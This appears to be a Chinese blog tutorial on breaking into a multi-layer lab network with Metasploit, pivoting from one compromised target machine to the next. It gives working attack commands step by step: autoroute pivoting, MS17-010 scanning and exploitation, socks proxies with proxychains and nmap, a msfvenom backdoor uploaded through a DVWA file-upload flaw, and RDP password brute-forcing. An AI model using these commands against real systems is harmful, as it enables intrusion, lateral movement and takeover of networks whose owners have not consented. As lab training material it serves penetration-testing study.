使用msf入侵多层级网络架构
2020-06-29 04:16
543 查看
假设,有一个多层网络环境,每层靶机只与相邻服务器互通,那么,如何从Hack的笔记本层层突破,获取到第4层靶机Server5的系统权限呢?
首先,我们通过Web入侵获得Server1权限,并通过横向渗透到Server2,获悉Server2可连外网、双网卡。在这里,我们以Server2作为攻击跳板机继续入侵。
第1层靶机→第2靶机
1、获取内网网段信息
meterpreter > run get_local_subnets [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...]Local subnet: 10.0.0.0/255.255.255.0Local subnet: 10.0.1.0/255.255.255.0通过内网本地路由查询,可以获悉内网网段地址为:10.0.1.0/24。
2、添加去往第二层内网网段(10.0.1.0/24)的静态路由。
meterpreter > run autoroute -s 10.0.1.0/24 [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...][*] Adding a route to 10.0.1.0/255.255.255.0...[+] Added route to 10.0.1.0/255.255.255.0 via 10.0.0.3[*] Use the -p option to list all active routes
3、扫描内网主机,使用msf下的扫描模块对IP段进行扫描看是否存来MS17-010漏洞。
use auxiliary/scanner/smb/smb_ms17_010 show optionsset rhosts 10.0.1.0/24set threads 50run通过扫描发现10.0.1.2存在MS-17010漏洞。
4、通过MS-17010漏洞获取Server3的系统权限。
use exploit/windows/smb/ms17_010_psexec set rhost 10.0.1.2 set payload windows/meterpreter/bind_tcp run5、成功获取第二层靶机权限,查看ip地址,发现第三个网段。
第2层靶机→第3靶机
1、添加第三个网段的静态理由。
meterpreter > run autoroute -s 10.0.2.0/24 [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...][*] Adding a route to 10.0.2.0/255.255.255.0...[+] Added route to 10.0.2.0/255.255.255.0 via 10.0.1.2[*] Use the -p option to list all active routes2、使用MS17-010扫描无果,发现10.0.2.2主机存活,利用msf搭建socks代理
use auxiliary/server/socks4aset srvport 9999run3、在攻击机Kali中,修改配置文件/etc/proxychains.conf
socks4 10.0.0.2 99994、使用proxychains 对第三层靶机进行端口扫描:
proxychains nmap -Pn -sT 10.0.2.2 -p1-10005、在Firefox中设置socks代理。
本地就可以直接访问到第三层靶机,在DVWA中,通过任意文件上传msf后门,获取站点权限。
6、利用msfvenom生成木马后门:
msfvenom -p windows/meterpreter/bind_tcp LPORT=8888 -f exe > shell.exe 攻击机监听:
use exploit/multi/handlerset PAYLOAD windows/meterpreter/bind_tcpset RHOST 10.0.2.2set LPORT 8888set ExitOnSession falseexploit -j -z7、在webshell中,上传并成功执行shell.exe,成功返回Server4的权限。
第3层靶机→第4靶机
1、添加第四个网段的静态理由。
meterpreter > run autoroute -s 10.0.3.0/24 [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...][*] Adding a route to 10.0.3.0/255.255.255.0...[+] Added route to 10.0.3.0/255.255.255.0 via 10.0.2.2[*] Use the -p option to list all active routes2、使用msf开启socks
use auxiliary/server/socks4aset srvport 6666run3、探测第四个网段存活的主机,发现10.0.3.2 开放了3389端口。
proxychains nmap -Pn -sT 10.0.3.0/24 -p22,80,33894、将第四层目标主机的3389流量转发到代理服务器中。
5、在本地对RDP账号密码进行爆破:
6、爆破成功后,使用账号密码成功登录服务器。
相关文章推荐
- NHibernate 配置文件的处理和使用多数据库的多层架构思路(第三部分,附源代码)
- NHibernate 配置文件的处理和使用多数据库的多层架构思路(补充部分一)
- NHibernate 配置文件的处理和使用多数据库的多层架构思路(第二部分)
- 从僵尸网络追踪到入侵检测 第7章 使用Honeydstats日志服务
- NHibernate 配置文件的处理和使用多数据库的多层架构思路(补充部分二)
- F5使用单臂网络架构问题之一
- 使用反向传播算法训练多层神经网络(图示)
- 使用虚幻引擎 4 年,网络架构大揭秘
- NHibernate 配置文件的处理和使用多数据库的多层架构思路(第一部分)
- 使用DHCP监听、IPSG和DAI实现Cisco多层交换网络的安全
- log4net在多层架构中的使用
- 网络五层架构及各层使用的协议
- 机器学习小试(2)使用多层神经网络进行分类实验
- Principles of training multi-layer neural network using backpropagation 使用后向传播算法训练多层神经网络的规则
- NHibernate 配置文件的处理和使用多数据库的多层架构思路(补充部分一)
- NHibernate 配置文件的处理和使用多数据库的多层架构思路(补充部分二)
- [转]NHibernate 配置文件的处理和使用多数据库的多层架构思路
- 带有点入侵色彩的LanHelper网络工具的使用 推荐
- 虚拟化基础架构之使用openfiler搭建iSCSI网络共享存储(IPSAN)